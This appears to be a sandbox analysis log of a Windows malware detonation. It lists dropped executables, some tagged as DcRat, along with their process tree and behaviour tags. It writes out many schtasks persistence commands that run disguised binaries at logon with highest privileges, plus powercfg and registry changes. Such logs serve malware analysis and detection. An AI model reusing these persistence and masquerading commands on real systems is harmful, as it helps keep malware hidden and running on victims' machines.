C:\Users\Admin\AppData\Local\Temp\a\go.exe"C:\Users\Admin\AppData\Local\Temp\a\go.exe"2⤵
-
C:\Users\Admin\AppData\Local\Temp\a\file300un-1.exe"C:\Users\Admin\AppData\Local\Temp\a\file300un-1.exe"2⤵
-
C:\Users\Admin\AppData\Local\Temp\a\fud.exe"C:\Users\Admin\AppData\Local\Temp\a\fud.exe"2⤵
- Checks computer location settings
- Drops file in Windows directory
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2000 -s 7163⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2000 -s 7643⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2000 -s 8323⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2000 -s 8883⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2000 -s 8963⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2000 -s 9243⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2000 -s 11403⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2000 -s 11483⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2000 -s 12403⤵
- Program crash
-
C:\Users\Admin\AppData\Local\Temp\154561dcbf\Dctooux.exe"C:\Users\Admin\AppData\Local\Temp\154561dcbf\Dctooux.exe"3⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2000 -s 12603⤵
- Program crash
-
C:\Users\Admin\AppData\Local\Temp\a\riviera_tour_sochi.pdf.exe"C:\Users\Admin\AppData\Local\Temp\a\riviera_tour_sochi.pdf.exe"2⤵
- Checks computer location settings
- Drops startup file
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Roaming\Riviera_tour_Sochi.pdf"3⤵
-
C:\Users\Admin\AppData\Local\Temp\a\mysto.exe"C:\Users\Admin\AppData\Local\Temp\a\mysto.exe"2⤵
- Checks computer location settings
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\RarSFX1\run.vbs"3⤵
- Checks computer location settings
-
C:\Users\Admin\AppData\Local\Temp\RarSFX1\SearchUI.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX1\SearchUI.exe"4⤵
-
C:\Users\Admin\AppData\Local\Temp\RarSFX1\RuntimeBroker.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX1\RuntimeBroker.exe"4⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 1824 -s 9725⤵
-
C:\Users\Admin\AppData\Local\Temp\a\blue2_A1.exe"C:\Users\Admin\AppData\Local\Temp\a\blue2_A1.exe"2⤵
-
C:\Users\Admin\AppData\Local\Temp\a\bullpen12.exe"C:\Users\Admin\AppData\Local\Temp\a\bullpen12.exe"2⤵
-
C:\Users\Admin\AppData\Local\Temp\a\yoffens_crypted_EASY.exe"C:\Users\Admin\AppData\Local\Temp\a\yoffens_crypted_EASY.exe"2⤵
-
C:\Users\Admin\AppData\Local\Temp\a\Build.exe"C:\Users\Admin\AppData\Local\Temp\a\Build.exe"2⤵
-
C:\Users\Admin\AppData\Local\Temp\a\lummalg.exe"C:\Users\Admin\AppData\Local\Temp\a\lummalg.exe"2⤵
-
C:\Users\Admin\AppData\Local\Temp\a\djdjdje1939_crypted_EASY.exe"C:\Users\Admin\AppData\Local\Temp\a\djdjdje1939_crypted_EASY.exe"2⤵
-
C:\Users\Admin\AppData\Local\Temp\a\Max.exe"C:\Users\Admin\AppData\Local\Temp\a\Max.exe"2⤵
-
C:\Users\Admin\AppData\Local\Temp\a\288c47bbc1871b439df19ff4df68f000766.exe"C:\Users\Admin\AppData\Local\Temp\a\288c47bbc1871b439df19ff4df68f000766.exe"2⤵
-
C:\Users\Admin\AppData\Local\Temp\a\fullwork.exe"C:\Users\Admin\AppData\Local\Temp\a\fullwork.exe"2⤵
-
C:\Users\Admin\AppData\Local\Temp\a\alex1234.exe"C:\Users\Admin\AppData\Local\Temp\a\alex1234.exe"2⤵
-
C:\Users\Admin\AppData\Local\Temp\a\Ledger-Live.exe"C:\Users\Admin\AppData\Local\Temp\a\Ledger-Live.exe"2⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3580 -s 5283⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 5052 -ip 50521⤵
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 4104 -ip 41041⤵
-
C:\Users\Public\svchost.exeC:\Users\Public\svchost.exe1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 3896 -ip 38961⤵
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}1⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 436 -ip 4361⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 196 -p 5264 -ip 52641⤵
-
C:\Users\Admin\AppData\Roaming\OneDrive.exeC:\Users\Admin\AppData\Roaming\OneDrive.exe1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Public\svchost.exeC:\Users\Public\svchost.exe1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 392 -p 5288 -ip 52881⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 5844 -ip 58441⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 3436 -ip 34361⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 6068 -ip 60681⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 492 -p 556 -ip 5561⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 3780 -ip 37801⤵
-
C:\Users\Public\svchost.exeC:\Users\Public\svchost.exe1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Roaming\OneDrive.exeC:\Users\Admin\AppData\Roaming\OneDrive.exe1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Roaming\grhgjhjh\grhgjhjh.exeC:\Users\Admin\AppData\Roaming\grhgjhjh\grhgjhjh.exe1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe2⤵
-
C:\Windows\system32\cmd.exe"cmd" /c mkdir "C:\Users\Admin\AppData\Roaming\grhgjhjh"2⤵
-
C:\Windows\system32\cmd.exe"cmd" /c schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\Admin\AppData\Roaming\grhgjhjh\grhgjhjh.exe'" /f2⤵
-
C:\Windows\system32\schtasks.exeschtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\Admin\AppData\Roaming\grhgjhjh\grhgjhjh.exe'" /f3⤵
- DcRat
- Creates scheduled task(s)
-
C:\Windows\system32\cmd.exe"cmd" /c copy "C:\Users\Admin\AppData\Roaming\grhgjhjh\grhgjhjh.exe" "C:\Users\Admin\AppData\Roaming\grhgjhjh\grhgjhjh.exe"2⤵
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "unsecappu" /sc MINUTE /mo 9 /tr "'C:\Windows\Resources\Themes\aero\Shell\unsecapp.exe'" /f1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "unsecapp" /sc ONLOGON /tr "'C:\Windows\Resources\Themes\aero\Shell\unsecapp.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "unsecappu" /sc MINUTE /mo 10 /tr "'C:\Windows\Resources\Themes\aero\Shell\unsecapp.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "explorere" /sc MINUTE /mo 12 /tr "'C:\BlockComponentwebMonitordhcp\explorer.exe'" /f1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "explorer" /sc ONLOGON /tr "'C:\BlockComponentwebMonitordhcp\explorer.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "explorere" /sc MINUTE /mo 5 /tr "'C:\BlockComponentwebMonitordhcp\explorer.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "RegistryR" /sc MINUTE /mo 10 /tr "'C:\Program Files\Windows Portable Devices\Registry.exe'" /f1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "Registry" /sc ONLOGON /tr "'C:\Program Files\Windows Portable Devices\Registry.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "RegistryR" /sc MINUTE /mo 5 /tr "'C:\Program Files\Windows Portable Devices\Registry.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "TextInputHostT" /sc MINUTE /mo 12 /tr "'C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\TextInputHost.exe'" /f1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "TextInputHost" /sc ONLOGON /tr "'C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\TextInputHost.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "TextInputHostT" /sc MINUTE /mo 12 /tr "'C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\TextInputHost.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "TrustedInstallerT" /sc MINUTE /mo 7 /tr "'C:\BlockComponentwebMonitordhcp\TrustedInstaller.exe'" /f1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "TrustedInstaller" /sc ONLOGON /tr "'C:\BlockComponentwebMonitordhcp\TrustedInstaller.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "TrustedInstallerT" /sc MINUTE /mo 10 /tr "'C:\BlockComponentwebMonitordhcp\TrustedInstaller.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "RegAsmR" /sc MINUTE /mo 10 /tr "'C:\Recovery\WindowsRE\RegAsm.exe'" /f1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "RegAsm" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\RegAsm.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "RegAsmR" /sc MINUTE /mo 8 /tr "'C:\Recovery\WindowsRE\RegAsm.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "dwmd" /sc MINUTE /mo 9 /tr "'C:\Windows\uk-UA\dwm.exe'" /f1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "dwm" /sc ONLOGON /tr "'C:\Windows\uk-UA\dwm.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "dwmd" /sc MINUTE /mo 14 /tr "'C:\Windows\uk-UA\dwm.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "servicess" /sc MINUTE /mo 14 /tr "'C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\v3.0\services.exe'" /f1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "services" /sc ONLOGON /tr "'C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\v3.0\services.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "servicess" /sc MINUTE /mo 12 /tr "'C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\v3.0\services.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1S" /sc MINUTE /mo 14 /tr "'C:\Program Files (x86)\Windows Media Player\fr-FR\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe'" /f1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1" /sc ONLOGON /tr "'C:\Program Files (x86)\Windows Media Player\fr-FR\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1S" /sc MINUTE /mo 7 /tr "'C:\Program Files (x86)\Windows Media Player\fr-FR\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "sihosts" /sc MINUTE /mo 14 /tr "'C:\Windows\ja-JP\sihost.exe'" /f1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "sihost" /sc ONLOGON /tr "'C:\Windows\ja-JP\sihost.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "sihosts" /sc MINUTE /mo 13 /tr "'C:\Windows\ja-JP\sihost.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "sppsvcs" /sc MINUTE /mo 7 /tr "'C:\Users\Public\Documents\My Music\sppsvc.exe'" /f1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "sppsvc" /sc ONLOGON /tr "'C:\Users\Public\Documents\My Music\sppsvc.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "sppsvcs" /sc MINUTE /mo 8 /tr "'C:\Users\Public\Documents\My Music\sppsvc.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "VSSVCV" /sc MINUTE /mo 11 /tr "'C:\odt\VSSVC.exe'" /f1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "VSSVC" /sc ONLOGON /tr "'C:\odt\VSSVC.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "VSSVCV" /sc MINUTE /mo 9 /tr "'C:\odt\VSSVC.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "sihosts" /sc MINUTE /mo 7 /tr "'C:\Users\Admin\Music\sihost.exe'" /f1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "sihost" /sc ONLOGON /tr "'C:\Users\Admin\Music\sihost.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "sihosts" /sc MINUTE /mo 11 /tr "'C:\Users\Admin\Music\sihost.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "VSSVCV" /sc MINUTE /mo 14 /tr "'C:\Program Files (x86)\Adobe\Acrobat Reader DC\VSSVC.exe'" /f1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "VSSVC" /sc ONLOGON /tr "'C:\Program Files (x86)\Adobe\Acrobat Reader DC\VSSVC.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "VSSVCV" /sc MINUTE /mo 9 /tr "'C:\Program Files (x86)\Adobe\Acrobat Reader DC\VSSVC.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1S" /sc MINUTE /mo 12 /tr "'C:\BlockComponentwebMonitordhcp\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe'" /f1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1" /sc ONLOGON /tr "'C:\BlockComponentwebMonitordhcp\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1S" /sc MINUTE /mo 8 /tr "'C:\BlockComponentwebMonitordhcp\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "IdleI" /sc MINUTE /mo 6 /tr "'C:\BlockComponentwebMonitordhcp\Idle.exe'" /f1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "Idle" /sc ONLOGON /tr "'C:\BlockComponentwebMonitordhcp\Idle.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "IdleI" /sc MINUTE /mo 5 /tr "'C:\BlockComponentwebMonitordhcp\Idle.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "OneDriveO" /sc MINUTE /mo 9 /tr "'C:\Program Files\7-Zip\OneDrive.exe'" /f1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "OneDrive" /sc ONLOGON /tr "'C:\Program Files\7-Zip\OneDrive.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "OneDriveO" /sc MINUTE /mo 6 /tr "'C:\Program Files\7-Zip\OneDrive.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\ProgramData\ndfbaljqaqzm\dckuybanmlgp.exeC:\ProgramData\ndfbaljqaqzm\dckuybanmlgp.exe1⤵
- Suspicious use of SetThreadContext
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 02⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 02⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-ac 02⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-dc 02⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\conhost.exeC:\Windows\system32\conhost.exe2⤵
-
C:\Windows\system32\svchost.exesvchost.exe2⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 592 -p 2372 -ip 23721⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 436 -p 5276 -ip 52761⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 392 -p 5276 -ip 52761⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\9699.bat" "1⤵
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\Software\clicker\key" /v primary /t REG_DWORD /d 12⤵
-
C:\Users\Public\svchost.exeC:\Users\Public\svchost.exe1⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 596 -p 276 -ip 2761⤵
-
C:\Windows\system32\dwm.exe"dwm.exe"1⤵
- Checks SCSI registry key(s)
- Enumerates system info in registry
- Modifies data under HKEY_USERS
-
C:\Users\Admin\AppData\Roaming\grhgjhjh\grhgjhjh.exeC:\Users\Admin\AppData\Roaming\grhgjhjh\grhgjhjh.exe1⤵
- Suspicious use of SetThreadContext
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe2⤵
-
C:\Windows\system32\cmd.exe"cmd" /c mkdir "C:\Users\Admin\AppData\Roaming\grhgjhjh"2⤵
-
C:\Windows\system32\cmd.exe"cmd" /c schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\Admin\AppData\Roaming\grhgjhjh\grhgjhjh.exe'" /f2⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 5124 -s 9442⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FD14.bat" "1⤵
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\Software\clicker\key" /v primary /t REG_DWORD /d 12⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 3440 -s 84641⤵
-
C:\Windows\explorer.exeexplorer.exe1⤵
- Modifies Installed Components in the registry
- Enumerates connected drives
- Checks SCSI registry key(s)
- Modifies registry class
- Suspicious use of SendNotifyMessage
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 612 -p 1936 -ip 19361⤵
-
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca1⤵
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 640 -p 3096 -ip 30961⤵
-
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca1⤵
-
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca1⤵
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of SetWindowsHookEx
-
C:\Users\Public\svchost.exeC:\Users\Public\svchost.exe1⤵
-
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca1⤵
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca1⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 636 -p 1132 -ip 11321⤵
-
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca1⤵
-
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca1⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 616 -p 4908 -ip 49081⤵
-
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca1⤵
- Modifies registry class
-
C:\Users\Public\svchost.exeC:\Users\Public\svchost.exe1⤵
-
C:\Users\Admin\AppData\Roaming\baecfetC:\Users\Admin\AppData\Roaming\baecfet1⤵
- Suspicious behavior: MapViewOfSection
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 648 -p 4176 -ip 41761⤵
-
